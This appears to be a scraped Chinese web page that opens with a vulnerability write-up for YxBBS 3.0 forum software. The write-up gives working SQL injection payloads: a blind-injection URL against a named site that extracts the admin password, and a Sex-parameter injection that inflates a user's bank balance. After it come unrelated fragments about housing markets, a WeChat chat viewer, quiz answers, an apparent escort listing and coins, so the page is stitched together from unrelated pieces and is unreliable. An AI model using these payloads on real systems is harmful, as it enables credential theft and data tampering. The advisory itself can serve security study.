影响版本:Yxbbs3.0漏洞描述:yxbbs在用户注册时,会实时检测用户名是否已存在以及用户名是否合法,不过服务端在检测时,对用户提交数据检验不够,本来人性化的一个功能,引入了一个注入点。具体涉及文件See.asp,对用户提交的 name = unescape(Request("name")) 并未做任何检验。 测试URL: http://www.yimxu.com/bbs/See.Asp?Action=CheckName&name=yxbbs' and (select top 1 asc(mid(password,1,1)) from yx_admin)>56 and '1'='1 //官方已经修补 第二处: 在Usersetup.asp中,有一个数字类型的变量,被当成文本检验过滤了,从而造成了一个SQL注入漏洞。 问题出在 Sex=yxbbs.Fun.GetStr("Sex") ,在Yx_Cls.asp里定义了GetStr这个 *** ,里面其实对于通常注入来说,有效的只是过滤了单引号。而在下面没有再对Sex进行任何检验,就参与SQL语句执行了: YxBBs.execute("update [YX_User] set Birthday='"&Birthday&"',Sex="&Sex&",PicW="&PicW&",PicH="&PicH&",Mail='"&Mail&"', *** ='"& *** &"',Honor='"&Honor&"',Pic='"&PicUrl&"',Home='"&Home&"',Sign='"&Sign&"',Is *** pic="&Isqqpic&" where name='"&YxBBs.MyName&"' And Password='"&YxBBs.MyPwd&"'") 如果是mssql数据库版本的,支持多步语句,那这个漏洞就是致命的。如果是access版本,那危害就小的多了,也就是改改参数吧。比如,可以给自己银行增加点存款,那sex就是 1,BankSave=9999999,修改完资料,银行存款就变9999999了。
市场走下坡路依然成为人们的共识,而对于西安市场则更是呈现出两极分化的趋势,且逐渐走向非常明显。这也在近期市场的开盘和意向登记的数据中可以看到。来看详情: 15项目开盘 最低去化率仅为5.3%...
微信聊天记录查看器可将苹果手机及安卓手机中的微信聊天内容导出到电脑上解密查看,不但可以查看与好友的私聊内容,也可查看群聊中的所有聊天内容。 编辑推荐:嗨格式数据恢复大师 软件能够查看所...
2020年5月27日支付宝蚂蚁庄园庄园小课堂答案是什么?5月27日的问题是我们的身份证,其实哪面才是正面?给出的选项是有国徽的一面、有照片的一面,大家知道应该选择哪个答案吗?下面小编为大家带来了202...
北京模特傲易的材料信息内容 预约网:qq附近的人 价钱花费:3158米 女学妹种类:高端外国模特 艺人经纪人:傲易 关心总数:1848 想约总数:973五人 資源总数:545两人 今天丽人:18...
古钱币极具观赏性与历史价值,因此古钱币如同其他古玩一样被藏家们所青睐。中国最早的机制洋式银元为光绪年间的“光绪元宝”,俗称“龙洋”,因钱币背面一般铸有龙纹而得名。珍稀古钱币是货币历史的实物,由于早已不...
近日,浙江义乌,男子顾某以为奔驰车标是银制的,连偷40个。当民警问起作案动机,顾某竟称是为了打一副银手镯。警方表示,虽然4S店报价3000元左右,但奔驰车标只是镀铬合金材质,通俗点说就是不锈钢。9月2...